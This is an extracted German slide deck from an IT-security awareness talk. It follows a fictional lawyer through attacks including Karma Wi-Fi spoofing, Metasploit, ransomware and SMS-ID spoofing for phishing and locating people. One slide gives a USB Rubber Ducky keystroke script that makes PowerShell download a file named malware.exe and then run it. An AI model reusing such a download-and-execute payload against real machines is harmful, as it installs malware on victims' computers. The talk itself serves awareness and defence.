Darf ich mich vorstellen?

Transkript

1 Hacking Night mit PROFIs Max Schmitt infiziert - Trojaner, Wu rmer, Viren, Ransomware und weiteres digitales Ungeziefer, das Handwerkszeug von Cyberkriminellen PROFI AG München Marco Di Filippo (MadIFI) Darf ich mich vorstellen? Marco Di Filippo (MadIFI) Computer-Enthusiast seit meiner Kindheit eine Tochter Seit 1996 im Bereich IT-Consulting tätig Werdegang: Von der Elektrotechnik, über TK-Security zur IT-Security Kompetenzen Empirische Sicherheitsprüfungen ICT- Security (VoIP, PSTN, GSM ) Hobbys Fußball-Schiedsrichter Electronic Music ICT-Security MadIFI 2 1

2 Nach Feierabend... MadIFI 3 Germany vs. Poland MadIFI 4 2

3 Das Opfer Max Schmidt Seit 2013 betreibt Max als Rechtsanwalt eine eigene Kanzlei ledig, mit Anna in einer Beziehung Merkmale: Ständig auf Achse Hobbys Sport (Squash, Laufen) Klavier Partys MadIFI 5 Das Opfer MadIFI 6 3

4 Das Unternehmen MadIFI 7 Angriffsvektoren 4

5 Wo erwartensie den Angreifer? Direkte Attacken BLOCKED PASSED BLOCKED MadIFI 11 Man in the Middle Phishing Indirekte Attacken (I) MadIFI

6 Indirekte Attacken (II) Malware Mobile Devices W-LAN PASSED MadIFI 13 Indirekte Attacken (III) Covert Channel Auslieferung via Medium (USB-Stick) Angreifer kontrollieren das Opfer Start via Auto-Start Company Network Internet MadIFI

7 Täglich neue Bedrohungen HEARTBLEED 90 M network devices vulnerable GHOST SHELLSHOCK 70% of all Internet-facing machines exposed FLASH STAGEFRIGHT Billion Android devices possibly affected by major flaw in Media Library WINDOWS Almost every Linux system vulnerable due to glibc flaw Almost every Linux system vulnerable due to glibc flaw Numerous remote code execution vulnerabilities discovered MadIFI 16 Ganz einfach... MadIFI

8 Ganz einfach... Quelle: MadIFI 18 Ganz einfach... What is your Password? MadIFI

9 Daten-Leaks MadIFI 20 Öffentliche Quellen MadIFI

10 Arbeitgeber MadIFI 22 Privates MadIFI

11 Privates MadIFI 24 Morgens am Flughafen Noch schnell s checken bevor es in den Flieger geht... MadIFI

12 Der JaSager [Karma-Attack] Yes. Karma-Attack Are you my preferred wireless network (Probe Requests)? Das Smartphone sucht mittels Probe Requests nach bekannten Access-Points Yes: SSID= Test D SSID: Test A? SSID: Test B? SSID: Test C? SSID: Test D? Access-Point MadIFI

13 WiFi-MITM Karma-Attack WiFi Yea h! WiFi available MadIFI 30 on the Mobile World Congress Wi-Fi Experiment Quelle: MadIFI

14 on the Mobile World Congress Wi-Fi Experiment Quelle: MadIFI 32 on the Mobile World Congress Wi-Fi Experiment Quelle: MadIFI

15 Beim Kunden angekommen... und noch schnell die aktuellen Quartalszahlen abrufen... MadIFI 34 Das Schweizer Taschenmesser für Hacker [Metasploit] 15

16 Metasploit OS Apps Api MadIFI 36 Watering Hole Attack MadIFI

17 Metasploit MadIFI 38 Metasploit MadIFI

18 Ransomware MadIFI 40 Ransomware Quelle: Quelle: er.abuse.ch/s tatistics/ MadIFI

19 Ransomware Fand innerhalb der letzten sechs Monate eine Infektion mit Ransomwarestatt? Quelle: BSI Umfrage Betroffenheit Ransomware 04/2016 MadIFI 42 Ransomware Fand innerhalb der letzten sechs Monate eine Infektion mit Ransomwarestatt? Quelle: BSI Umfrage Betroffenheit Ransomware 04/2016 MadIFI

20 Ransomware Fand innerhalb der letzten sechs Monate eine Infektion mit Ransomwarestatt? Quelle: BSI Umfrage Betroffenheit Ransomware 04/2016 MadIFI 44 Datentausch mit dem Kunden Noch schnell die Daten auf den USB-Stick laden... MadIFI

21 Angriffe mittels Human Interface Device [Rubber Ducky USB Attack] Human Interface Device (HID) DELAY 1000 ESCAPE COMMAND r DELAY 400 STRING cmd ENTER DELAY 400 STRING PowerShell(New-Object System.Net.WebClient).DownloadFile(' NK exe','malware.exe');Start-Process'malware.exe ENTER STRING exit ENTER MadIFI

22 Human Interface Device (HID) USB Rubber Ducky Deluxe Pack MadIFI 49 Identifikationsfälschung [SMS-ID-Spoofing] 22

23 SMS-ID-Spoofing Game Over SMS MadIFI 64 SMS-ID-Spoofing Stagefright: Ein Alptraum für Googles Android-Software-Ökosystem MadIFI

24 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Beispiel einer Phishing-SMS Originalnachricht des Netzbetreibers MadIFI 66 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Beispiel einer Phishing-SMS Gefälschte Nachricht auf Grundlage der Netzbetreiber-SMS MadIFI

25 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Beispiel einer Phishing-SMS Gefälschte Nachricht auf Grundlage der Netzbetreiber-SMS MadIFI 68 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing Den Wettbewerber zuhause lassen MadIFI

26 Live Demo SMS-ID-Spoofing SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing zur Ortung Beispiel einer Phishing-SMS zum orten eines Teilnehmers MadIFI

27 SMS-ID-Spoofing Beispiel: SMS-Phishing mittels SMS-Spoofing zur Ortung Beispiel einer Phishing-SMS zum orten eines Teilnehmers MadIFI 72 SMS-ID-Spoofing MadIFI

28 Beispiele SMS-ID-Spoofing MadIFI 74 Premium Rate Numbers MadIFI

29 Beispiele SMS-ID-Spoofing MadIFI 76 Am nächsten Tag im Büro Die Daten vom Notebook ins Firmennetz übertragen... MadIFI

30 Wissen ist Macht... Wirwollen niemanden zu einer Straftat anstiften! Allegezeigten Informationen dienen ausschließlich dazu sie zu sensibilisieren! Denn nur wer um die Gefahren weiss, kann sich davor schützen. Wenn sie Fragen im Bereich IT-Sicherheit haben, sprechen sie uns an. MadIFI 95 Offene Diskussion Follow MadIFI

31 Vielen Dank! Vielen Dank für Ihre Aufmerksamkeit! MadIFI 97 Kontakt KORAMIS GmbH: Europaallee Saarbrücken Germany info@koramis.de Marco Di Filippo Business Communication m.difilippo@koramis.de Phone: Fax: Mobil: Office Berlin: Uhlandstraße Berlin Germany Follow Slideconcept: Marco Di Filippo Review: Laura-Louise Di Filippo MadIFI